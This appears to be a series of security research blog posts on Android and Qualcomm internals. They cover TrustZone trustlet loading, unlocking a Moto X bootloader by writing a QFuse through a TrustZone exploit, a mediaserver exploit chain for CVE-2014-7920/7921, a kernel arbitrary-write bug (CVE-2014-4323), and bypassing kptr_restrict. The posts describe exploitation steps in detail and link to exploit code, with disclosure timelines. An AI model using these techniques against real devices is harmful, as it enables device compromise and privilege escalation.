After the verification process we saw above, the TrustZone kernel loads the trustlet's segments into a secure memory region ("secapp-region") which is inaccessible from the "Normal World" and assigns an ID to it.

Then, the kernel switches into "Secure World" user-mode and executes the trustlet's entry function:

As you can see, the trustlet registers itself with the TrustZone kernel, along with a "handler function". After registering the trustlet, control is returned to the TrustZone kernel, and the loading process finishes.

Now, once the trustlet is loaded, the "Normal World" can send commands to the trustlet by issuing a special SCM call (called "QSEOS_CLIENT_SEND_DATA_COMMAND") containing the loaded trustlet's ID and the request and response buffers. Here's what it looks like:

The TrustZone kernel (TZBSP) receives the SCM call, maps it to QSEOS, which then finds the application with the given ID and calls the handler function which was registered earlier (from "Secure World" user-mode) in order to serve the request.

What's Next?

Now that we have some understanding of what trustlets are and how they are loaded, we can move on to the exploits! In the next blog post we'll find a vulnerability in a very popular trustlet and exploit it in order to execute code within QSEE.

Unlocking the Motorola Bootloader

2016-02-10T21:27:00.001+02:00

In this blog post, we'll explore the Motorola bootloader on recent Qualcomm Snapdragon devices. Our goal will be to unlock the bootloader of a Moto X (2nd Gen), by using the TrustZone kernel code execution vulnerability from the previous blog posts. Note that although we will show the complete unlocking process for this specific device, it should be general enough to work at-least for most modern Motorola devices.

Why Motorola?

After reporting the previous TrustZone kernel privilege escalation to Qualcomm, I was gifted a shiny new Moto X. However... There was one little snag - they accidentally sent me a locked device. This was a completely honest mistake, and they did offer many times to unlock the device - but where's the fun in that? So without further ado, let's dive into the Motorola bootloader and see what it takes to unlock it.

Setting the Stage

Before we start our research, let's begin with a short introduction to the boot process - starting right at the point at which a device is powered on.

First - the PBL (Primary Boot Loader), also known as the "BootROM" is executed. Since the PBL is stored within an internal mask ROM, it cannot be modified or provisioned, and is therefore an intrinsic part of the device. As such, it only serves the very minimal purpose of allowing the device to boot, and authenticating and loading the next part of the boot-chain.

Then, two secondary bootloaders are loaded, SBL1 (Secondary Boot Loader), followed by SBL2. Their main responsibility is to boot up the various processors on the SoC and configure them so that they're ready to operate.

Next up in the boot-chain, the third and last secondary bootloader, SBL3, is loaded. This bootloader, among other tasks, verifies and loads the Android Bootloader - "aboot".

Now this is where we get to the part relevant for our unlocking endeavours; the Android Bootloader is the piece of software whose responsibility is, as its name suggests, to load the Android operating system and trigger its execution.

This is also the piece of boot-chain that OEMs tend to customize the most, mainly because while the first part of the boot-chain is written by Qualcomm and deals with SoC specifics, the Android bootloader can be used to configure the way the Android OS is loaded.

Among the features controlled by aboot is the "bootloader lock" - in other words, aboot is the first piece of the boot-chain which can opt to break the chain of trust (in which each bootloader stage verifies the next) and load an unsigned operating system.

For devices with an unlockable bootloader, the unlocking process is usually performed by rebooting the device into a special ("bootloader") mode, and issuing the relevant fastboot command. However, as we will later see, this interface is also handled by aboot. This means that not only does aboot query the lock status during the regular boot process, but it also houses the code responsible for the actual unlocking process.

As you may know, different OEMs take different stances on this issue. In short, "Nexus" devices always ship with an "unlockable" bootloader. In contrast, Samsung doesn't allow bootloader unlocking for most of its devices. Other OEMs, Motorola included, ship their devices locked, but certain devices deemed "eligible" can be unlocked using a "magic" (signed) token supplied by the OEM (although this also voids the warranty for most devices).

So... it's all very complex, but also irrelevant. That's because we're going to do the whole process manually - if aboot can control the lock status of the device, this means we should probably be able to do so as well, given an elevated enough set of privileges.

Getting Started

Now that we have a general grasp of the components involved and of our goal, the next stage is to analyse the actual aboot code.

Since the binaries for all stages of the boot-chain are contained within the factory firmware image, that would naturally be a good place to start. There are several download links available - here are a few. In case you would like to follow along with me, I'm going to refer to the symbols in the version "ATT_XT1097_4.4.4_KXE21.187-38".

After downloading the firmware image, we are faced with our first challenge - the images are all packed using a proprietary format, in a file called "motoboot.img". However, opening the file up in a hex-editor reveals it has a pretty simple format we can deduce:

As you can see above, the sought-after aboot image is stored within this file, along with the TrustZone image, and various stages of the boot-chain. Good.

After analysing the structure above, I've written a python script which can be used to unpack all the images from a given Motorola bootloader image, you can find it here.

Much ado aboot nothing

We'll start by inspecting the aboot image. Discouragingly, it is 1MB large, so going over it all would be a waste of time. However, as we've mentioned above, when booting the device into the special "bootloader" mode, the actual interaction with the user is provided by aboot itself. This means that we can start by searching for the strings which are displayed when the unlocking process is performed - and continue from there.

A short search for the "unlock..." string which is printed after starting the unlock process brings us straight to the function (@0xFF4B874) which deals with the unlocking logic:

That was pretty fast!

As you can see, after printing the string to the console, three functions are called consecutively, and if all three of them succeed, the device is considered unlocked.

Going over the last two functions reveals their purpose is to erase the user's data partitions (which is always performed after the bootloader is unlocked, in order to protect the device owner's privacy). In any case, this means they are irrelevant to the unlocking process itself and are simply side-effects.

This leaves us with a single function which, when called, should unlock the bootloader.

So does this mean we're done already? Can we just call this function and unlock the device?

Actually, not yet. Although the TrustZone exploit allows us to achieve code-execution within the TrustZone kernel, this is only done after the operating system is loaded, at which point, executing aboot code directly could cause all sorts of side-effects (since, for example, the code might assume that there is no operating system/the MMU could be disabled, etc.). And even if it were that simple, perhaps there is something interesting to be learned by fully understanding the locking mechanism itself.

Regardless, if we can understand the logic behind the code, we can simply emulate it ourselves, and perform the meaningful parts of it from our TrustZone exploit. Analysing the unlocking function reveals a surprisingly simple high-level logic:

Unfortunately, these two functions wreak havoc within IDA (which fails to even display a meaningful call-graph for them).

Manually analysing the functions reveals that they are in fact quite similar to one another. They both don't contain much logic of their own, but instead they prepare arguments and call the following function:

This is a little surprising - instead of handling the logic itself, this function issues an an SMC (Supervisor Mode Call) in order to invoke a TrustZone system-call from aboot itself! (as we've discussed in previous blog posts). In this case, both functions issue an SMC with the request code 0x3F801. Here is the relevant pseudo-code for each of them:

At this point we've gleaned all the information we need from aboot, now lets switch over to the TrustZone kernel to find out what this SMC call does.

Enter Stage Left, TrustZone

Now that we've established that an SMC call is made with the command-code 0x3F801, we are left with the task of finding this command within the TrustZone kernel.

Going over the TrustZone kernel system calls, we arrive at the following entry:

This is a huge function which performs widely different tasks based on the first argument supplied, which we'll call the "command code" from now on.

It should be noted an additional flag is passed into this system-call indicating whether or not it was called from a "secure" context. This means that if we try invoking it from the Android OS itself, an argument will be passed marking our invocation is insecure, and will prevent us from performing these operations ourselves. Of course, we can get around this limitation using our TrustZone exploit, but we'll go into that later!

As we've seen above, this SMC call is triggered twice, using the command codes #1 and #2 (I've annotated the functions below to improve readability):

In short, we can see both commands are used to read and write (respectively) values from something called a "QFuse".

QFuses

Much like a real-life fuse, a QFuse is a hardware component which facilitates a "one-time-writeable" piece of memory. Each fuse represents a single bit; fuses which are in-tact represent the bit zero, and "blown" fuses represent the bit one. However, as the name suggests, this operation is irreversible - once a fuse is blown it cannot be "un-blown".

Each SoC has it's own arrangement of QFuses, each with it's own unique purpose. Some fuses are already blown when a device is shipped, but others can be blown depending on the user's actions in order to change the way a specific device feature operates.

Unfortunately, the information regarding the role of each fuse is not public, and we are therefore left with the single option of reversing the various software components to try and deduce their role.

In our case, we call a specific function in order to decide which fuse we are going to read and write:

Since we call this function with the second syscall argument, in our case "4", this means we will operate on the fuse at address 0xFC4B86E8.

Putting it all together

Now that we understand the aboot and the TrustZone logic, we can put them together to get the full flow:

First, aboot calls SMC 0x3F801 with command-code #1

This causes the TrustZone kernel to read and return the QFuse at address 0xFC4B86E8

Then, iff the first bit in the QFuse is disabled, aboot calls SMC 0x3F801 once more, this time with command-code #2

This causes the TrustZone kernel to write the value 1 to the LSB of the aforementioned QFuse.

Turns out to be very simple after all - we just need to set a single bit in a single QFuse, and the bootloader will be considered unlocked.

But how can QFuses be written?

DIY QFuses

Luckily the TrustZone kernel exposes a pair of system-call which allow us to read and write a restricted set of QFuses - tzbsp_qfprom_read_row and tzbsp_qfprom_write_row, respectively. If we can lift those restrictions using our TrustZone exploit, we should be able to use this API in order to blow the wanted QFuse.

Lets take a look at these restrictions within the tzbsp_qfprom_write_row system-call:

So first, there's a DWORD at 0xFE823D5C which must be set to zero in order for the function's logic to continue. Normally this flag is in fact set to one, thus preventing the usage of the QFuse calls, but we can easily enough overwrite the flag using the TrustZone exploit.

Then, there's an additional function called, which is used to make sure that the ranges of fuses being written are "allowed":

As we can see, this function goes over a static list of pairs, each denoting the start and end address of the allowed QFuses. This means that in order to pass this check, we can overwrite this static list to include all QFuses (setting the start address to zero and the end address to the maximal QFuse relative address - 0xFFFF).

Trying it out

Now that we have everything figured out, it's time to try it out ourselves! I've written some code which does the following:

Achieves code-execution within TrustZone
Disables the QFuse protections
Writes the LSB QFuse in QFuse 0xFC4B86E8

I encourage you to check out the code here: https://github.com/laginimaineb/Alohamora

Have fun!

Final Thoughts

In this blog post we went over the flow controlled by a single QFuse. But, as you can probably guess, there are many different interesting QFuses out there, waiting to be discovered.

On the one hand, blowing a fuse is really "dangerous" - making one small mistake can permanently brick you device. On the other hand, some fuses might facilitate a special set of features that we would like to enable.

One such example is the "engineering" fuse; this fuse is mentioned throughout the aboot image, and can be used to enable an amazing range of capabilities such as skipping secure boot, loading unsigned peripheral images, having an unsigned GPT, and much more.

However, this fuse is blown in all consumer devices, marking the device as a "non-engineer" device, and disabling these features. But who knows, maybe there are other fuses which are just as important, which have not yet been discovered...

Android privilege escalation to mediaserver from zero permissions (CVE-2014-7920 + CVE-2014-7921)

2016-01-24T15:54:00.002+02:00

In this blog post we'll go over two vulnerabilities I discovered which, when combined, enable arbitrary code execution within the "mediaserver" process from any context, requiring no permissions whatsoever.

How bad is it?

The first vulnerability (CVE-2014-7921) was present in all Android version from 4.0.3 onwards. The second vulnerability (CVE-2014-7920) was present in all Android versions from 2.2 (!). Also, these vulnerabilities are not vendor specific and were present in all Android devices. Since the first vulnerability is only needed to bypass ASLR, and ASLR is only present (in a meaningful form) from Android 4.1 onwards, this means that these vulnerabilities allow code execution within "mediaserver" on any Android device starting from version 2.2.

Although I reported both vulnerabilities in mid October 2014, they were unfortunately only fixed much later (see "Timeline" for full description, below) - in Android version 5.1! This means that there are many devices out there which are still vulnerable to these issues, so please take care.

You can find the actual patches here. The patches were pushed to AOSP five months after the vulnerabilities were reported.

That said, the Android security team was very pleasant to work with, and with other vulnerabilities I reported later on, were much more responsive and managed to solve the issues within a shorter time-frame.

Where are we at?

Continuing our journey of getting from zero permissions to TrustZone code execution; after recently completing the task of getting to TrustZone from the Linux kernel, and after finding a way to gain code execution within the Linux kernel, we are left with the final step of gaining the privileges needed in order to execute our kernel exploit.

As mentioned in the previous blog post in the series, in order to exploit the kernel vulnerability in the "qseecom" driver, an attacker must only satisfy one of the following conditions:

Gain execution within one of "mediaserver", "drmserver", "surfaceflinger" or "keystore"
Run within a process with the "system", "drm" or "keystore" user-ID
Run within a process with the "drmrpc" group-ID

In this blog post, we'll gain code execution within the "mediaserver" process, thus completing our journey from zero permissions to TrustZone kernel code execution.

Diving in

As it's name suggests, the "mediaserver" process is in charge of all media-related tasks. In order to serve different media-related requests, the process exposes a large set of features in the form of four different services:

"media.audio_policy" - Enables manipulation of different audio related policies, such as the volumes of different audio streams
"media.audio_flinger" - Main configuration endpoint for media-related tasks, such as recording audio, muting the phone, etc.
"media.camera" - Allows interaction with the device's cameras.
"media.player" - Allows the playback of many different media formats (for example, by using the "stagefright" library).

As you've probably seen, lately there's been a lot of focus on the "media.player" service (ala Stagefright) , especially focusing on different media-parsing libraries which are utilised by it. However, in this post we'll cover two vulnerabilities in a different service - the "media.audio_policy" service.

Usually, when registering an Android service, the actual implementation of the service is provided in the Java programming language. This means that finding memory corruption vulnerabilities is more difficult, since those would only present themselves in unique circumstances (using a native "JNI" call from Java code, delegating a feature to a native library, etc.).

However, in the case of the "mediaserver" process, all of the services housed within the process are implemented in the C++ programming language, making the prospect of finding memory corruptions much more viable.

Actually, implementing a service is quite a hard task to fulfil in a secure manner - recall when we previously discussed kernel vulnerabilities? Well, in order to prevent accidental access to user-provided data, the kernel uses a coding convention in which user-provided pointers are marked as "tainted". However, for interaction between userspace services, there is no such feature. This means that implementers of a service must always pay attention to the origin of the processed data, and can't trust it at all.

Let's get down to business

Here's the game plan - first of all, we'll need to look for a memory corruption vulnerability in the audio policy service. Then, we'll need to find a way to reliably exploit this vulnerability. This is usually made difficult by the presence of ASLR.

For those of you who haven't encountered ASLR (Address Space Layout Randomization) yet, you should definitely check this link for Android-specific information (and this link to see the problems still present in Android's ASLR implementation).

Now, without any further ado, let's take a look at the functionality exposed by the audio policy service. Unsurprisingly, we'll start at the "main" function of the "mediaserver" process:

Looks straight-forward enough. However, looking deeper reveals that while both "AudioPolicyService" and "AudioFlinger" register themselves as the handlers for commands directed at the "media.audio_policy" and "media.audio_flinger" services respectively, they actually acts as a façades for the real concrete implementation, which is provided after going through several layers of abstraction.

The end result is that the actual implementation for most functionality provided by "AudioPolicyService" and some of the functionality provided by "AudioFlinger" are in fact handled by a single class - "AudioPolicyManagerBase". As a result, this is the class we're going to be focusing on from now on.

Limited Write Primitive

Whenever a user would like to start an output stream on a particular output device (such as the front or back speakers), he may do so by calling the "startOutput" function, provided by the audio policy service.

This function receives three arguments:

The output descriptor - this must be a device (such as the front or back speakers).
The type of stream for which the output should be opened (should be one of the predefined stream types).
The session ID - this should be a number corresponding to a previously opened session.

Initially, the function verifies the "output" parameter by fetching the AudioOutputDescriptor object corresponding to the given output device. This means that this argument must, in fact, be valid.

But what about the other two arguments? Well, peering a little further reveals the following call:

Doesn't seem too shady, but let's just make sure the stream argument is safely handled:

Oh.

So - as we can see above, the function uses the "stream" argument as an index into an array (of 32-bit values) within the AudioOutputDescriptor object - and both reads and writes to that address, without ever sanitizing the stream number. We're off to a good start already!

In reality, there are only a handful of valid stream_type values (it is in fact an enumerated type), so adding appropriate validation is an easy as checking that the given argument is within the enumerations minimal and maximal values:

Regardless - there are still some constraints we need to figure out. First and foremost, in order to avoid unnecessary side-effects, we would like to choose an output descriptor which is not "duplicated" (so as not to execute the first block). Luckily, this is easy - most output descriptors are in fact not duplicated by default.

Moving on, when would the second block in this function execute? Well, since the "delta" argument is always 1, this means we'll enter the block iff (int)mRefCount[stream] + 1 is negative. Meaning, if the value pointed to is larger than or equal to 0x7FFFFFFF (since we're dealing with a 32-bit system).

If that were to happen, the actual value would be logged to the system log (an info leak!), and would then be zeroed out before returning from the function. Although this is a nice info-leak, it has two obvious downsides (and another one which I won't cover in this post):

Reading the leaked value requires the READ_LOGS permission (and we originally stated we would like to start with zero permissions)
The value being read is corrupted - this could be troublesome for quite a few exploitation techniques.

But all is definitely not lost; we can still create a much stronger primitive using this vulnerability. Assuming the second if block is not executed, we arrive at the function's end:

So the target value is incremented by one; a limited write primitive. Note that the final log statement is not actually included in a release build (since ALOGV is an empty macro is those builds).

Putting this all together, we get a write primitive allowing us to increment the value at mRefCount[stream] by one, so long as it is not larger than or equal to 0x7FFFFFFF.

I spy with my little eye

Now that we have a write primitive, let's look for a read primitive. Also, since our write primitive is relative to an AudioOutputDescriptor object, which is dynamically allocated (and is therefore located in a rather unpredictable location in the heap), it would be much more convenient if we were able to find such a primitive which is also relative to an AudioOutputDescriptor object.

Pouring over the AudioPolicyManagerBase's methods once more, reveals a very tempting target; the AudioPolicyManagerBase::isStreamActive method. This method allows a user to query a given stream in order to check if it was active in any of the output descriptors within the user-supplied time-frame:

So once again - this method performs no validation at all on the given "stream" argument. Perhaps the validation is delegated to the internal AudioOutputDescriptor::isStreamActive method?

Nope - lucky once again!

So, once more we access the mRefCount member of the AudioOutputDescriptor using the "stream" argument as a index (while performing no validation whatsoever). As we can see, there are two cases in which this function would return true:

If mRefCount[stream] != 0
Otherwise, if the time difference between the current system time and the value of mStopTime[stream] is less than the user-supplied argument - inPastMs.

Since we would like to use this vulnerability as an easy read primitive, we would first seek to eliminate side-effects. This is crucial as it would make the actual exploit much easier to build (and much more modular).

However, simply passing in the argument "inPastMs" with the value 0x80000000 (i.e., INT_MIN), would cause the last if statement to always evaluate to false (since there are no integers smaller than INT_MIN).

This leaves us with a simple and "clean" (albeit somewhat weak) read primitive: the function isStreamActive will return true iff the value at mRefCount[stream] is not zero. Since the stream argument is fully controlled by us, we can use it to "scan" the memory relative to the AudioOutputDescriptor object, and to gage whether or not it contains a zero DWORD.

Thermal Vision

At this point you might be wondering - how can you even call this a read-primitive? After all, the only possible information we can learn using this vulnerability is whether or not the value at a given address is zero. Glad you (kind-of) asked!

In fact, this is more than enough for us to find our way around the heap. Instead of thinking in terms of "heap" and "memory", let's use our imagination.

You're a secret agent out on a mission. You're standing behind a closed door, leading to the room you need to enter. So what do you naturally do? Turn on your thermal vision goggles, of course. The goggles present you with the following image:

So it's safe - we can see it's only a dog.

Let's look at the image again - did we really need all the heat information? For example, what if we only had information if a given pixel is "hot" or not?

Still definitely recognizable.

This is because the outline of the dog allowed us to create a "heat signature", which we could then use to identify dogs using our thermal goggles.

So what about heaps and memory? Let's say that when a value in memory is non-zero, it is "hot", and otherwise, that memory location is "cold". Now - using our read-primitive, we can create a form of thermal vision goggles, just like the pair we imagined a minute ago.

All that remains to be seen is whether or not we can create good "heat signatures" for objects we are interested in.

First, looking at a histogram of a full memory dump of the heap in the mediaserver process, reveals that the value zero is by far the most common:

Moreover, typical heap objects appear to have many zeros within them, leading to some interesting repeatable patterns. Here is a heat-map generated from the aforementioned heap dump:

Now - looking at the binary heat-map we can see there are still many interesting patterns we can use to try and "understand" which objects we are observing:

So now that you're (hopefully) convinced, we can move on to building an actual exploit!

Building an exploit

As we've established above, we now have two tools in our belt:

We can increment any value, so long as it's lower than 0x7FFFFFFF
We can inspect a memory location in order to check if it contains the value zero or not

In order to take this one step further, it would be nice if we were able to find an object that has a very "distinct" heat-signature, and which also contains pointers to functions which we can call (using regular API calls), and to which we can pass controllable arguments.

Searching around for a bit, reveals a prime candidate for exploitation - audio_hw_device. This is a structure holding many function pointers for the implementations of each of the functions provided by an actual audio hardware device (it is part of the audio hardware abstraction layer). Moreover, these function pointers can also be triggered at ease simply by calling different parts of the audio policy service and audio flinger APIs.

However, what makes this object especially interesting is its structure - it begins with a header with a fixed length initialized with non-zero values. Then, it contains a large block of "reserved" values, which are initialized to zero, followed by a large block of function pointers, of whom only the second one is initialized to zero.

This means audio_hw_device objects have quite a unique heat signature:

So we can easily find these objects, great! Now what?

Let's sketch a game-plan:

Search for a audio_hw_device using its heat signature
Create a "stronger" read primitive (using the existing primitives)
Create a "stronger" write primitive (again, using the existing primitives)
Using the new primitives, hijack a function to execute arbitrary code

We've already seen how we can search for a audio_hw_device by using the heat signature mentioned above, but what about creating new primitives?

Harder Better Faster Stronger (primitives)

In order to do so, we would like to hijack a function within the audio_hw_device structure with the following properties:

We can easily trigger a call to this function by invoking external API calls
The function's return value is returned to the user
The arguments to this function are completely user-controlled

Reading through the different API calls once more, we arrive at the perfect candidate; AudioFlinger::getInputBufferSize:

As you can see, an audio_config structure is populated using the user-provided values, and is then passed on to the audio hardware device's implementation - get_input_buffer_size.

This means that if we find our audio_hw_device, we can modify the get_input_buffer_size function pointer to point to any gadget we would like to execute - and whichever value we return from that gadget, will be simply returned to the user.

Creating the primitives

First of all, we would like to find out the real memory address of the audio_hw_device structure. This is useful in case we would like to pass a pointer to a location within this object at a later stage of the exploit.

This is quite easily accomplished by using our weak write primitive in order to increment the value of the get_input_buffer_size function pointer so that it will point to a "BX LR" gadget - i.e., instead of performing any operation, the function will simply return.

Since the first argument provided to the function is a pointer the audio_hw_device structure itself, this means it will be stored in register R0 (according to the ARM calling convention), so upon executing our crafted return statement, the value returned will be the value of R0, namely, the pointer to the audio_hw_device.

Now that we have the address of the audio_hw_device, we would like to also read an address within one of the loaded libraries. This is necessary so that we'll be able to calculate the absolute location of other loaded libraries and gadgets within them.

However, as we've seen before, the audio_hw_device structure contains many function pointers - all of whom point to the text segment of one of the loaded libraries. This means that reading any of these function pointers is sufficient for us to learn the location of the loaded libraries.

Moreover, since the get_input_buffer_size function receives the audio_hw_device as its first argument, we can search for any gadget which reads into R0 a value from R0 at an offset which falls within the function pointer block range, and returns. There are many such gadgets, so we can simply chose one:

At this point, we know the location of the audio_hw_device and of the loaded libraries. All that's left is to create an arbitrary write primitive.

As we've since before, three user-controlled values are inserted into a structure and passed as the second argument (R1) to get_input_buffer_size. We can now use this to our advantage; we'll pass in values corresponding to our wanted write address and value as the first two arguments to the function. These will get packed into the first two values in the audio_config structure.

Now, we'll search for a unique gadget which unpacks these two values from R1, writes our crafted value into the wanted location and returns.

While this seems like a lot to ask for, after searching through a multitude of gadgets, there appears to be a gadget (in libcamera_client.so) which does just this:

This means we can now increment the get_input_buffer_size function pointer to point to this gadget, and by passing the wanted values to the AudioFlinger::getInputBufferSize function, we can now write any 32-bit value to any absolute address within the mediaplayer process's virtual address space.

We have lift-off

Now that we have all the primitives we need, we just need to put the pieces together. We'll create an exploit which calls the "system" function within the "mediaserver" process.

Once we have the addresses of the audio_hw_device and the library addresses, along with an arbitrary write primitive, we can prepare the arguments to our "system" function call anywhere within mediaserver's virtual address space.

A good scratch pad candidate would be the "reserved" block within the audio_hw_device, since we already know its absolute memory location (because we leaked the address of the audio_hw_device), and we also know that overwriting that area won't have any negative side-effects. Using our write primitive, we can now write the path we would like to call "system" on to the "reserved" block, along with the address of the "system" function itself (which we can calculate since we leaked the library load address).

Now, we can use our write primitive to change the get_input_buffer_size function pointer one final time - this time we would like to point it at a gadget which would unpack the function address and argument we have written into the reserved block, and would execute the function using this argument. This gadget was found in libstagefright.so:

So... This is it; we now have code execution within the "mediaserver" process. Here's a small diagram recapping our total exploit flow:

Full Exploit Code

As always; I'd like to provide the full exploit code we have covered in this blog post. You can get it here:

https://github.com/laginimaineb/cve-2014-7920-7921

The gadgets were collected for Android version 4.3, but can obviously be adjusted to whichever Android version you would like to run the exploit against (up to Android 5.1).

I highly recommend that you download and look at the exploit's source code - there are many nuances I did not cover in the blog post (for brevity's sake) and the each stage of the exploit is heavily documented.

Have fun!

Timeline

14.10.14 - Vulnerabilities disclosed to Google
21.10.14 - Notified the Android security team that I've written a full exploit
13.12.14 - Sent query to Google regarding the current fix status
03.01.15 - Got response stating that the patches will be rolled out in the upcoming version
03.02.15 - Sent another query to Google
18.02.15 - Got response stating the fix status has not changed
08.03.15 - Sent third query to Google
19.03.15 - Got response saying patches have been pushed into Android 5.1

Android linux kernel privilege escalation (CVE-2014-4323)

2015-08-26T02:06:00.000+03:00

In this blog post, we'll cover another Android linux kernel privilege escalation vulnerability I discovered, which could be used to achieve kernel code execution on Android devices.

This time we'll only go over the vulnerability, with no exploit, since I don't personally have any device which is vulnerable to this issue, and therefore couldn't write an exploit. However, we'll dream up an exploit together, which should be pretty simple to implement.

Before we start, I'd like to point out that this vulnerability has been responsibly disclosed to Qualcomm, and it has since been fixed (see "Timeline" below). It should be noted that this vulnerability was present in all Qualcomm-based devices based on the following chipsets:

APQ 8064 (Snapdragon S4 Pro)
MSM 8960 (Snapdragon S4)
MSM 8660 (Snapdragon S3)
MSM 8x30
MSM 7x30

So all devices based on these SoCs (such as the Nexus 4, Nexus 7, etc.), with kernels dated before December 2014, should be vulnerable (see "Timeline" below).

Let's get to it

Today we'll take a look at the "mdp" display driver. There are slight variations of this driver, depending on the SoC. However, both the MDP22 and MDP303 versions (which correspond to the SoCs listed above) are vulnerable.

Normally, users may access the display driver in order to modify the display's properties, and perhaps even in order to retrieve the current frame-buffer (that is, take a screenshot).

Since these operations are somewhat sensitive, they are usually restricted so that only processes with the "graphics" group-ID may perform them. This is facilitated by setting the permissions on the device files appropriately:

Naturally, the process in charge of compositing surfaces on Android (surfaceflinger) is a member of this group. However! The shell user is also a member of the graphics group - meaning, it can interact freely with the "mdp" driver (and therefore the vulnerability is also locally exploitable).

shell's user-ID and group-IDs

Diving into the code

The "mdp" driver is extremely complex, supporting a wide range of commands; from IOCTLs, to memory mapping the device, etc.

This means we need a good strategy for mapping out the weak spots within the driver. Skimming over the code, going by the sheer amount of IOCTL commands supported (at least twenty different commands), it seems as though looking at the IOCTL commands in depth might be a lucrative venture.

Funnily, though, there was no need to go too deeply, since the second IOCTL command turned out to be vulnerable :)

MSMFB_SET_LUT

The "mdp" driver allows a user to change the colour map lookup table used by the display, by means of a special IOCTL called "MSMFB_SET_LUT". The actual implementation of this IOCTL is deferred to a simple call to an internal function pointer, which is initialized to point to the actual implementation based on the MDP platform which is compiled into the kernel.

The above "lut_update" function pointer is initialized to point to the "mdp_lut_update_lcdc" on the MDP22 system, and to "mdp_lut_update_nonlcdc" on the MDP303. Keep in mind that both of these functions receive the "fb_cmap" structure which is copied from the user directly, without any validations (as evidenced above).

Both of these functions call the "mdp_lut_hw_update" function directly in order to update the lookup-table, without performing any validations of their own on the user-controlled "fb_cmap" structure.

Let's take a good look at the "fb_cmap" structure:

Alarm bells should be ringing right about now:

This structure contains a large (32-bit) length field
There's a "start" field which is not only large (32-bit), but whose name indicates that it might actually be treated as a pointer, even though its type is an unsigned integer
All the pointers in the structures aren't marked as "tainted" (using "__user")!

Finally - let's keep our fingers crossed and take a look at the "mdp_lut_hw_update" function:

First, the function iterates "len" times. Then, for each iteration, the function reads the red, green and blue values from the "fb_cmap" (safely, using "copy_from_user"). But here comes the scary part:

On first glance - this might just be some innocuous piece of code. After all, who knows what MDP_OUTP means... But we've come this far, let's at least find out what it means:

Still non the wiser. What does "outpdw" do?

Oh.

For those who haven't come across it before, "writel" simply writes the value in "val" into the address at "port", using a memory write barrier beforehand. This is usually used in order to write to memory mapped registers, in order to make sure the write itself remains coherent.

Regardless, this means that the function above writes the concatenated value of the red, green and blue parameters (which are fully user controlled), into an address which is built from fully known, constant values and a fully controlled 32-bit value which is not validated in any way, since:

"MDP_BASE" is a macro which is defined to a constant memory mapped address (one for each SoC)
0x93800 is a constant number and therefore also known in advance
"mdp_lut_i" is actually a flag which is set alternately to either 0 or 1, on each call to MDSSFB_SET_LUT. This means that the value of 0x400*mdp_lut_i is either 0 or 0x400
Since we can set cmap->len to 1, the index "i" will therefore be zero in the single iteration performed, meaning we can ignore i*4 (since it will equal zero)
cmap->start is fully user-controlled and never validated

Here's what it looks like:

Putting it together - this means that we can write any 24-bit value into any memory address - great! :)

Dreaming up an exploit

First, as with all exploits, we'd like to neatly package the write-what-where primitive into a single function. Let's imagine we've done that, and that it's called write_value, and it accepts a 24-bit value and a 32-bit address to which this value should be written.

In order to make exploitation fully reliable, we'd need to know the current value of "mdp_lut_i". This can be done by mapping a sterile buffer within user-space which is more than 0x400 bytes large. Then, we can simply trigger to overwrite vulnerability with a cmap->start value so that the destination address will either correspond to the beginning of this mapped buffer, or to its end:

After triggering the overwrite, we can check the sterile buffer to see where the overwrite occurred - allowing us to deduce the value of "mdp_lut_i".

Now that we know all the values from which the destination address is built, we can freely overwrite any address within the kernel's virtual address space. From here on, we can simply overwrite a kernel function pointer and redirect it to a function stub allocated within user-space.

This is actually identical to the exploitation method covered in a previous blog post - in which we overwrote a function pointer within "pppolac_proto_ops" and triggered it by closing a PPP_OLAC socket.

And there you have it. A fully imaginary exploit, just waiting to be written :) If you do happen to write this exploit, please let me know!

Timeline

27.09.14 - Vulnerability disclosed
29.09.14 - Initial response from QC
02.10.14 - Issue confirmed by QC
13.11.14 - QC publishes notification to customers
27.11.14 - QC publishes notification to carriers
11.12.14 - Issue closed, CAF advisory issued

Effectively bypassing kptr_restrict on Android

2015-08-25T17:59:00.001+03:00

In this blog post, we'll take a look at a few ways that I've discovered in order to bypass kptr_restrict on Android, allowing for easier exploitation of vulnerabilities that require some information on the virtual addresses in which the kernel is loaded. But first, for those of you who aren't familiar with the "protection" offered by kptr_restrict, let's get you up to speed on the subject.

What's kptr_restrict?

As we've seen in the previous blog post, sometimes exploits require knowledge of internal kernel pointers - either in order to hijack them, or in order to corrupt them in a controllable manner.

This fact has been known for quite some time - enough time, in fact, for it to be addressed directly. The Linux kernel contains a feature which enables it to filter out such addresses in order to avoid leaking them to a potential attacker. This configurable feature is called "kptr_restrict", and has been present in the Android kernel source tree for at least two years.

As with nearly all configurable kernel parameters, there exists a special file which allows to set the way in which this feature behaves when attempting to filter kernel addresses. In the case of kptr_restrict, the file resides in "/proc/sys/kernel/kptr_restrict", but has some daunting permissions set:

Essentially, only root can modify its value, but any user can read it.

So how does kptr_restrict work? Well, first of all, kernel developers needed a way to mark kernel pointers as such, whenever those are outputted. This is achieved by using a new format specifier, "%pK", which is used to denote that the value written into that specifier contains a kernel pointer, and as such, should be protected.

There are three different values which control the protection offered by kptr_restrict:

0 - The feature is completely disabled
1 - Kernel pointers which are printed using "%pK" are hidden (replaced with zeroes), unless the user has the CAP_SYSLOG capability, and has not changed their UID/GID (to prevent leaking pointers from files opened before dropping permissions).
2 - All kernel pointers printed using "%pK" are hidden

The default value of this configuration is chosen when building the kernel (via CONFIG_SECURITY_KPTR_RESTRICT), but for all modern Android devices that I've ever encountered, this value is always set to "2".

However - how many kernel developers actually know of the need to protect kernel pointers by using "%pK"? The can be easily answered by grepping the kernel for this format string. The answer is, as expected, quite sad:

Merely 35 times (in 23 files) within the entire kernel source code. Needless to say, kernel pointers are very often printed using the "normal" pointer format specifier, "%p" - a simple search shows many hundreds of such uses.

So now that we've set the stage, let's see why the protection offered by kptr_restrict is insufficient on it's own.

Method #1 - Getting dmesg from shell

All log messages printed by the kernel are written to a circular buffer held within the kernel's memory. Users may read from this buffer by invoking the "dmesg" (display message) command. This command actually accesses the buffer by invoking the syslog system call, as you can see from this strace output:

However, the syslog system call can't be accessed by just any user - specifically, the caller must either posses the extremely powerful CAP_SYS_ADMIN capability, or the weaker (and more specific) capability of CAP_SYSLOG.

Either way, most Android processes do not, in fact, have these capabilities, and therefore can't access the kernel log. Or can they? :)

Recall that within Android, the "init" process maintains a list of "services" which can be started or stopped as needed. These services are loaded by "init" upon boot, from a hard-coded list of configuration files, which are almost always stored on the root (read-only) partition, and are therefore read-only.

